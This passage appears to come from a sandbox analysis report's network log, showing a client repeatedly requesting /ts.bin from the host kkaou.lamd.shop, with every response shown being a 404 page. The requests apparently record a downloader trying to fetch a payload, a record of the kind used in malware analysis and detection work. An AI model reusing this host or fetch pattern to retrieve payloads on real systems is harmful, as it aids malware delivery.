                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:36.989248991 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:37.375027895 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:22 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:37.488666058 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:37.874259949 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:23 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:37.988866091 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:38.376343966 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:23 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:38.488782883 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:38.874520063 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:24 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:38.988941908 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:39.375052929 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:24 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:39.676187992 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:40.063754082 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:25 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:40.176436901 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:40.562194109 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:26 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:40.676971912 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:41.301554918 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:26 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:41.412286997 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:41.800426006 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:27 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:41.926594019 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:42.312633038 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:27 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:42.427601099 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:42.813083887 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:28 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:43.114161968 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:43.503914118 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:29 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:43.693762064 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:44.079679012 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:29 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:44.191874981 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:44.578094959 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:30 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:44.692048073 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:45.078269958 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
